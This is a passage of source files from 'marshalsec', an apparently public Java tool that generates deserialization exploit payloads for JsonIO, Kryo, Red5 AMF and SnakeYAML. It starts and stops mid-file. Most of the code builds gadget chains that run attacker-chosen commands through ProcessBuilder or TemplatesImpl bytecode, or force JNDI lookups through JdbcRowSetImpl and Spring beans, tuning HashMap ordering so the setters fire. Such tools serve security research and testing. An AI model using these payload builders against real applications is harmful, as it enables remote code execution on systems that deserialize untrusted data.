marshalsec.MarshallerBase#unmarshal(java.lang.Object) 62 | */ 63 | @Override 64 | public Object unmarshal ( byte[] data ) throws Exception { 65 | ByteArrayInputStream bis = new ByteArrayInputStream(data); 66 | try ( ObjectInputStream ois = new ObjectInputStream(bis) ) { 67 | return ois.readObject(); 68 | } 69 | } 70 | 71 | 72 | /** 73 | * {@inheritDoc} 74 | * 75 | * @see marshalsec.UtilFactory#makeComparatorTrigger(java.lang.Object, java.util.Comparator) 76 | */ 77 | @Override 78 | public Object makeComparatorTrigger ( Object tgt, Comparator cmp ) throws Exception { 79 | return JDKUtil.makePriorityQueue(tgt, cmp); 80 | } 81 | 82 | 83 | public static void main ( String[] args ) { 84 | new Java().run(args); 85 | } 86 | } 87 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/JsonIO.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.util.Arrays; 27 | 28 | import javax.xml.transform.Templates; 29 | 30 | import com.cedarsoftware.util.io.JsonReader; 31 | import com.cedarsoftware.util.io.JsonWriter; 32 | 33 | import marshalsec.gadgets.Args; 34 | import marshalsec.gadgets.TemplatesUtil; 35 | import marshalsec.gadgets.Groovy; 36 | import marshalsec.gadgets.JDKUtil; 37 | import marshalsec.gadgets.LazySearchEnumeration; 38 | import marshalsec.gadgets.Primary; 39 | import marshalsec.gadgets.Resin; 40 | import marshalsec.gadgets.Rome; 41 | import marshalsec.gadgets.SpringAbstractBeanFactoryPointcutAdvisor; 42 | import marshalsec.gadgets.SpringUtil; 43 | import marshalsec.gadgets.UnicastRefGadget; 44 | import marshalsec.gadgets.UnicastRemoteObjectGadget; 45 | import marshalsec.gadgets.XBean; 46 | 47 | 48 | /** 49 | * 50 | * 51 | * Not applicable: 52 | * - BindingEnumeration: cannot construct BindingEnumeration 53 | * - SpringPartiallyComparableAdvisorHolder: cannot construct AspectJPointcutAdvisor 54 | * - CommonsConfiguration: cannot restore additional properties in map/set 55 | * - ServiceLoader: cannot construct URLClassPath 56 | * - ImageIO: cannot construct FilterIterator as it dereferences a null iterator 57 | * 58 | * @author mbechler 59 | */ 60 | public class JsonIO extends MarshallerBase implements UnicastRefGadget, UnicastRemoteObjectGadget, Groovy, 61 | SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin, LazySearchEnumeration { 62 | 63 | @Override 64 | public String marshal ( Object o ) throws Exception { 65 | return JsonWriter.objectToJson(o); 66 | } 67 | 68 | 69 | @Override 70 | public Object unmarshal ( String data ) throws Exception { 71 | return JsonReader.jsonToJava(data); 72 | } 73 | 74 | 75 | @Override 76 | public Object makeEqualsTrigger ( Object tgt, Object sameHash ) throws Exception { 77 | // make sure that nested maps are restored first 78 | return Arrays.asList(tgt, sameHash, JDKUtil.makeMap(tgt, sameHash)); 79 | } 80 | 81 | 82 | @Override 83 | public Object makeHashCodeTrigger ( Object o ) throws Exception { 84 | // make sure that nested maps are restored first 85 | return Arrays.asList(o, JDKUtil.makeMap(o, o)); 86 | } 87 | 88 | 89 | /** 90 | * Example with default bean factory method trigger instead, alt strategy required for ProcessBuilder 91 | */ 92 | @Args ( minArgs = 1, args = { 93 | "cmd", "args..." 94 | }, defaultArgs = { 95 | MarshallerBase.defaultExecutable 96 | } ) 97 | @Override 98 | public Object makeBeanFactoryPointcutAdvisor ( UtilFactory uf, String[] args ) throws Exception { 99 | return SpringUtil 100 | .makeBeanFactoryTriggerBFPA(uf, "caller", SpringUtil.makeMethodTrigger(new ProcessBuilder(args), "start")); 101 | } 102 | 103 | 104 | /** 105 | * 106 | * Example with ROME triggering TemplatesImpl direct bytecode execution 107 | */ 108 | @Override 109 | @Primary 110 | @Args ( minArgs = 1, args = { 111 | "cmd", "args..." 112 | }, defaultArgs = { 113 | MarshallerBase.defaultExecutable, "/tmp/foo" 114 | } ) 115 | public Object makeRome ( UtilFactory uf, String[] args ) throws Exception { 116 | Object tpl = TemplatesUtil.createTemplatesImpl(args); 117 | String marshalled = marshal(makeROMEAllPropertyTrigger(uf, Templates.class, (Templates) tpl)); 118 | // add the transient _tfactory field 119 | marshalled = marshalled.replace( 120 | "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",", 121 | "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \"_tfactory\"" 122 | + ": {\"@type\" : \"com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl\"},"); 123 | return marshalled; 124 | } 125 | 126 | 127 | public static void main ( String[] args ) { 128 | new JsonIO().run(args); 129 | } 130 | 131 | } 132 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/Kryo.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.io.ByteArrayOutputStream; 27 | 28 | import com.esotericsoftware.kryo.io.Input; 29 | import com.esotericsoftware.kryo.io.Output; 30 | 31 | import marshalsec.gadgets.CommonsBeanutils; 32 | import marshalsec.gadgets.SpringAbstractBeanFactoryPointcutAdvisor; 33 | 34 | 35 | /** 36 | * 37 | * Not applicable: 38 | * - Most, as public default constructor is required, see {@link KryoAltStrategy}. 39 | * 40 | * @author mbechler 41 | * 42 | */ 43 | public class Kryo extends MarshallerBase implements SpringAbstractBeanFactoryPointcutAdvisor, CommonsBeanutils { 44 | 45 | /** 46 | * {@inheritDoc} 47 | * 48 | * @see marshalsec.MarshallerBase#marshal(java.lang.Object) 49 | */ 50 | @Override 51 | public byte[] marshal ( Object o ) throws Exception { 52 | com.esotericsoftware.kryo.Kryo k = makeKryo(); 53 | ByteArrayOutputStream bos = new ByteArrayOutputStream(); 54 | try ( Output output = new Output(bos) ) { 55 | k.writeClassAndObject(output, o); 56 | } 57 | return bos.toByteArray(); 58 | } 59 | 60 | 61 | /** 62 | * {@inheritDoc} 63 | * 64 | * @see marshalsec.MarshallerBase#unmarshal(java.lang.Object) 65 | */ 66 | @Override 67 | public Object unmarshal ( byte[] data ) throws Exception { 68 | com.esotericsoftware.kryo.Kryo k = makeKryo(); 69 | try ( Input in = new Input(data) ) { 70 | return k.readClassAndObject(in); 71 | } 72 | } 73 | 74 | 75 | protected com.esotericsoftware.kryo.Kryo makeKryo () { 76 | return new com.esotericsoftware.kryo.Kryo(); 77 | } 78 | 79 | 80 | public static void main ( String[] args ) { 81 | new Kryo().run(args); 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/KryoAltStrategy.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import org.objenesis.strategy.StdInstantiatorStrategy; 27 | 28 | import marshalsec.gadgets.Args; 29 | import marshalsec.gadgets.BindingEnumeration; 30 | import marshalsec.gadgets.Groovy; 31 | import marshalsec.gadgets.ImageIO; 32 | import marshalsec.gadgets.LazySearchEnumeration; 33 | import marshalsec.gadgets.Resin; 34 | import marshalsec.gadgets.Rome; 35 | import marshalsec.gadgets.ServiceLoader; 36 | import marshalsec.gadgets.SpringPartiallyComparableAdvisorHolder; 37 | import marshalsec.gadgets.SpringUtil; 38 | import marshalsec.gadgets.XBean; 39 | 40 | 41 | /** 42 | * 43 | * Not applicable: 44 | * - ImageIO: cannot restore method 45 | * 46 | * @author mbechler 47 | * 48 | */ 49 | public class KryoAltStrategy extends Kryo implements Rome, SpringPartiallyComparableAdvisorHolder, Groovy, Resin, LazySearchEnumeration, 50 | BindingEnumeration, ServiceLoader, ImageIO, XBean { 51 | 52 | /** 53 | * {@inheritDoc} 54 | * 55 | * @see marshalsec.Kryo#makeKryo() 56 | */ 57 | @Override 58 | protected com.esotericsoftware.kryo.Kryo makeKryo () { 59 | com.esotericsoftware.kryo.Kryo k = super.makeKryo(); 60 | k.setInstantiatorStrategy(new com.esotericsoftware.kryo.Kryo.DefaultInstantiatorStrategy(new StdInstantiatorStrategy())); 61 | return k; 62 | } 63 | 64 | 65 | /** 66 | * Example with default bean factory method trigger instead, alt strategy required for ProcessBuilder 67 | */ 68 | @Args ( minArgs = 1, args = { 69 | "cmd", "args..." 70 | }, defaultArgs = { 71 | MarshallerBase.defaultExecutable 72 | } ) 73 | @Override 74 | public Object makeBeanFactoryPointcutAdvisor ( UtilFactory uf, String[] args ) throws Exception { 75 | return SpringUtil 76 | .makeBeanFactoryTriggerBFPA(uf, "caller", SpringUtil.makeMethodTrigger(new ProcessBuilder(args), "start")); 77 | } 78 | 79 | 80 | public static void main ( String[] args ) { 81 | new KryoAltStrategy().run(args); 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/Red5AMF0.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import org.apache.mina.core.buffer.IoBuffer; 27 | import org.red5.io.amf.Input; 28 | 29 | import flex.messaging.io.SerializationContext; 30 | import flex.messaging.io.amf.AbstractAmfOutput; 31 | import flex.messaging.io.amf.Amf0Output; 32 | 33 | 34 | /** 35 | * @author mbechler 36 | * 37 | */ 38 | public class Red5AMF0 extends Red5AMFBase { 39 | 40 | /** 41 | * {@inheritDoc} 42 | * 43 | * @see marshalsec.Red5AMFBase#createInput(org.apache.mina.core.buffer.IoBuffer) 44 | */ 45 | @Override 46 | protected Input createInput ( IoBuffer buf ) { 47 | return new org.red5.io.amf.Input(buf); 48 | } 49 | 50 | 51 | /** 52 | * {@inheritDoc} 53 | * 54 | * @see marshalsec.BlazeDSBase#createOutput(flex.messaging.io.SerializationContext) 55 | */ 56 | @Override 57 | protected AbstractAmfOutput createOutput ( SerializationContext sc ) { 58 | return new Amf0Output(sc); 59 | } 60 | 61 | 62 | public static void main ( String[] args ) { 63 | new Red5AMF0().run(args); 64 | } 65 | } 66 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/Red5AMF3.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import org.apache.mina.core.buffer.IoBuffer; 27 | import org.red5.io.amf.Input; 28 | 29 | import flex.messaging.io.SerializationContext; 30 | import flex.messaging.io.amf.AbstractAmfOutput; 31 | import flex.messaging.io.amf.Amf3Output; 32 | 33 | 34 | /** 35 | * @author mbechler 36 | * 37 | */ 38 | public class Red5AMF3 extends Red5AMFBase { 39 | 40 | /** 41 | * {@inheritDoc} 42 | * 43 | * @see marshalsec.Red5AMFBase#createInput(org.apache.mina.core.buffer.IoBuffer) 44 | */ 45 | @Override 46 | protected Input createInput ( IoBuffer buf ) { 47 | return new org.red5.io.amf3.Input(buf); 48 | } 49 | 50 | 51 | /** 52 | * {@inheritDoc} 53 | * 54 | * @see marshalsec.BlazeDSBase#createOutput(flex.messaging.io.SerializationContext) 55 | */ 56 | @Override 57 | protected AbstractAmfOutput createOutput ( SerializationContext sc ) { 58 | return new Amf3Output(sc); 59 | } 60 | 61 | 62 | public static void main ( String[] args ) { 63 | new Red5AMF3().run(args); 64 | } 65 | } 66 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/Red5AMFBase.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.util.Collections; 27 | import java.util.LinkedHashMap; 28 | import java.util.Map; 29 | 30 | import org.apache.mina.core.buffer.IoBuffer; 31 | import org.red5.io.amf.Input; 32 | import org.red5.io.object.Deserializer; 33 | import org.springframework.beans.factory.config.PropertyPathFactoryBean; 34 | import org.springframework.jndi.support.SimpleJndiBeanFactory; 35 | 36 | import com.sun.rowset.JdbcRowSetImpl; 37 | 38 | import flex.messaging.io.SerializationContext; 39 | import flex.messaging.io.amf.AbstractAmfInput; 40 | import marshalsec.gadgets.Args; 41 | import marshalsec.gadgets.JdbcRowSet; 42 | import marshalsec.gadgets.Primary; 43 | import marshalsec.util.Reflections; 44 | 45 | 46 | /** 47 | * 48 | * 49 | * Uses BlazeDS for output 50 | * 51 | * @author mbechler 52 | * 53 | */ 54 | public abstract class Red5AMFBase extends BlazeDSBase implements JdbcRowSet { 55 | 56 | /** 57 | * {@inheritDoc} 58 | * 59 | * @see marshalsec.BlazeDSBase#unmarshal(byte[]) 60 | */ 61 | @Override 62 | public Object unmarshal ( byte[] data ) throws Exception { 63 | IoBuffer buf = IoBuffer.wrap(data); 64 | Input i = createInput(buf); 65 | return Deserializer.deserialize(i, Object.class); 66 | } 67 | 68 | 69 | /** 70 | * @param buf 71 | * @return 72 | */ 73 | protected abstract Input createInput ( IoBuffer buf ); 74 | 75 | 76 | @Override 77 | @Args ( minArgs = 1, args = { 78 | "jndiUrl" 79 | }, defaultArgs = { 80 | MarshallerBase.defaultJNDIUrl 81 | } ) 82 | public Object makePropertyPathFactory ( UtilFactory uf, String[] args ) throws Exception { 83 | String jndiUrl = args[ 0 ]; 84 | PropertyInjectingProxy bfproxy = new PropertyInjectingProxy( 85 | new SimpleJndiBeanFactory(), 86 | Collections.singletonMap("shareableResources", new String[] { 87 | jndiUrl 88 | })); 89 | 90 | // RED5 uses a regular HashMap to temporarily store the property values 91 | // 92 | // To make sure the property setters are called in the right order we 93 | // have to make sure that they end up in bins matching that order 94 | Map values = new LinkedHashMap<>(); 95 | int size = 16; 96 | for ( ; size < Short.MAX_VALUE; size = size << 1 ) { 97 | long p = mapHash("propertyPath".hashCode() & 0xFFFFFFFFL) % size; 98 | long t = mapHash("targetBeanName".hashCode() & 0xFFFFFFFFL) % size; 99 | long b = mapHash("beanFactory".hashCode() & 0xFFFFFFFFL) % size; 100 | if ( p <= b && t <= b ) { 101 | System.err.println(String.format("propertyPath @ %d targetBeanName @ %d beanFactory @ %d with table size %d", p, t, b, size)); 102 | break; 103 | } 104 | } 105 | 106 | values.put("propertyPath", "a"); 107 | values.put("targetBeanName", jndiUrl); 108 | values.put("beanFactory", bfproxy); 109 | 110 | // this blows up the table to the desired size 111 | // keys must be distributed more or less evenly or the hash table won't expand to the desired size 112 | for ( int j = 0; j < size / 2; j++ ) { 113 | values.put("" + j, ""); 114 | } 115 | 116 | return new PropertyInjectingProxy(new PropertyPathFactoryBean(), values); 117 | } 118 | 119 | 120 | @Override 121 | @Primary 122 | @Args ( minArgs = 1, args = { 123 | "jndiUrl" 124 | }, defaultArgs = { 125 | MarshallerBase.defaultJNDIUrl 126 | } ) 127 | public Object makeJdbcRowSet ( UtilFactory uf, String[] args ) throws Exception { 128 | Map values = new LinkedHashMap<>(); 129 | int size = 16; 130 | 131 | // see makePropertyPathFactory for the gritty details 132 | for ( ; size < Short.MAX_VALUE; size = size << 1 ) { 133 | long d = mapHash("dataSourceName".hashCode() & 0xFFFFFFFFL) % size; 134 | long a = mapHash("autoCommit".hashCode() & 0xFFFFFFFFL) % size; 135 | if ( d <= a ) { 136 | System.err.println(String.format("dataSourceName @ %d autoCommit @ %d with table size %d", d, a, size)); 137 | break; 138 | } 139 | } 140 | values.put("dataSourceName", args[ 0 ]); 141 | values.put("autoCommit", true); 142 | for ( int j = 0; j < size / 2; j++ ) { 143 | values.put("" + j, ""); 144 | } 145 | return new PropertyInjectingProxy(Reflections.createWithoutConstructor(JdbcRowSetImpl.class), values); 146 | } 147 | 148 | 149 | /** 150 | * @param l 151 | * @return 152 | */ 153 | private static long mapHash ( long l ) { 154 | return ( l ^ ( l >>> 16 ) ); 155 | } 156 | 157 | 158 | /** 159 | * {@inheritDoc} 160 | * 161 | * @see marshalsec.BlazeDSBase#createInput(flex.messaging.io.SerializationContext) 162 | */ 163 | @Override 164 | protected AbstractAmfInput createInput ( SerializationContext sc ) { 165 | return null; 166 | } 167 | 168 | } 169 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/SideEffectSecurityManager.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.io.FilePermission; 27 | import java.io.SerializablePermission; 28 | import java.lang.reflect.ReflectPermission; 29 | import java.net.NetPermission; 30 | import java.security.Permission; 31 | import java.security.SecurityPermission; 32 | import java.util.PropertyPermission; 33 | import java.util.logging.LoggingPermission; 34 | 35 | 36 | /** 37 | * @author mbechler 38 | * 39 | */ 40 | public class SideEffectSecurityManager extends SecurityManager { 41 | 42 | /** 43 | * {@inheritDoc} 44 | * 45 | * @see java.lang.SecurityManager#checkPermission(java.security.Permission) 46 | */ 47 | @Override 48 | public void checkPermission ( Permission perm ) { 49 | if ( perm instanceof RuntimePermission ) { 50 | if ( checkRuntimePermission((RuntimePermission) perm) ) { 51 | return; 52 | } 53 | } 54 | else if ( perm instanceof ReflectPermission ) { 55 | return; 56 | } 57 | else if ( perm instanceof LoggingPermission ) { 58 | return; 59 | } 60 | else if ( perm instanceof SecurityPermission ) { 61 | return; 62 | } 63 | else if ( perm instanceof PropertyPermission ) { 64 | return; 65 | } 66 | else if ( perm instanceof NetPermission && perm.getName().equals("specifyStreamHandler") ) { 67 | return; 68 | } 69 | else if ( perm instanceof FilePermission && perm.getActions().equals("read") ) { 70 | return; 71 | } 72 | else if ( perm instanceof SerializablePermission ) { 73 | return; 74 | } 75 | 76 | super.checkPermission(perm); 77 | } 78 | 79 | 80 | /** 81 | * {@inheritDoc} 82 | * 83 | * @see java.lang.SecurityManager#checkPropertyAccess(java.lang.String) 84 | */ 85 | @Override 86 | public void checkPropertyAccess ( String key ) {} 87 | 88 | 89 | /** 90 | * @param perm 91 | */ 92 | private static boolean checkRuntimePermission ( RuntimePermission perm ) { 93 | 94 | if ( perm.getName().startsWith("accessClassInPackage.") ) { 95 | return true; 96 | } 97 | 98 | switch ( perm.getName() ) { 99 | case "setSecurityManager": 100 | return true; 101 | case "accessDeclaredMembers": 102 | return true; 103 | case "reflectionFactoryAccess": 104 | return true; 105 | case "createClassLoader": 106 | return true; 107 | case "getClassLoader": 108 | return true; 109 | case "setContextClassLoader": 110 | return true; 111 | case "shutdownHooks": 112 | return true; 113 | case "loadLibrary.net": 114 | return true; 115 | case "getProtectionDomain": 116 | return true; 117 | case "accessSystemModules": 118 | return true; 119 | } 120 | 121 | return false; 122 | } 123 | 124 | } 125 | -------------------------------------------------------------------------------- /ldap/src/main/java/marshalsec/SnakeYAML.java: -------------------------------------------------------------------------------- 1 | /* MIT License 2 | 3 | Copyright (c) 2017 Moritz Bechler 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | */ 23 | package marshalsec; 24 | 25 | 26 | import java.net.URL; 27 | import java.net.URLClassLoader; 28 | import java.util.Collections; 29 | import java.util.LinkedHashMap; 30 | import java.util.Map; 31 | 32 | import javax.management.BadAttributeValueExpException; 33 | import javax.naming.InitialContext; 34 | import javax.naming.Reference; 35 | import javax.script.ScriptEngineManager; 36 | 37 | import org.apache.commons.configuration.ConfigurationMap; 38 | import org.apache.commons.configuration.JNDIConfiguration; 39 | import org.apache.xbean.naming.context.ContextUtil.ReadOnlyBinding; 40 | import org.apache.xbean.naming.context.WritableContext; 41 | import org.eclipse.jetty.plus.jndi.Resource; 42 | import org.springframework.beans.factory.config.PropertyPathFactoryBean; 43 | import org.springframework.jndi.support.SimpleJndiBeanFactory; 44 | import org.yaml.snakeyaml.Yaml; 45 | 46 | import marshalsec.gadgets.Args; 47 | import marshalsec.gadgets.C3P0RefDataSource; 48 | import marshalsec.gadgets.C3P0WrapperConnPool; 49 | import marshalsec.gadgets.CommonsConfiguration; 50 | import marshalsec.gadgets.JdbcRowSet; 51 | import marshalsec.gadgets.ResourceGadget; 52 | import marshalsec.gadgets.ScriptEngine; 53 | import marshalsec.gadgets.SpringAbstractBeanFactoryPointcutAdvisor; 54 | import marshalsec.gadgets.SpringPropertyPathFactory; 55 | import marshalsec.gadgets.XBean; 56 | 57 | 58 | /** 59 | * 60 | * Not applicable: 61 | * - ROME: cannot construct java.lang.Class instance 62 | * - ImageIO: cannot construct Method instance, can however still be used to trigger an iterator 63 | * 64 | * - LazySearchEnumeration: may be possible 65 | * 66 | * @author mbechler 67 | * 68 | */ 69 | public class SnakeYAML extends YAMLBase implements ScriptEngine, JdbcRowSet, CommonsConfiguration, C3P0RefDataSource, C3P0WrapperConnPool, 70 | SpringPropertyPathFactory, SpringAbstractBeanFactoryPointcutAdvisor, XBean, ResourceGadget { 71 | 72 | /** 73 | * {@inheritDoc} 74 | * 75 | * @see marshalsec.MarshallerBase#marshal(java.lang.Object) 76 | */ 77 | @Override 78 | public String marshal ( Object o ) throws Exception { 79 | Yaml r = new Yaml(); 80 | return r.dump(o); 81 | } 82 | 83 | 84 | /** 85 | * {@inheritDoc} 86 | * 87 | * @see marshalsec.MarshallerBase#unmarshal(java.lang.Object) 88 | */ 89 | @Override 90 | public Object unmarshal ( String data ) throws Exception { 91 | Yaml r = new Yaml(); 92 | return r.load(data); 93 | } 94 | 95 | 96 | @Override 97 | @Args ( minArgs = 1, args = { 98 | 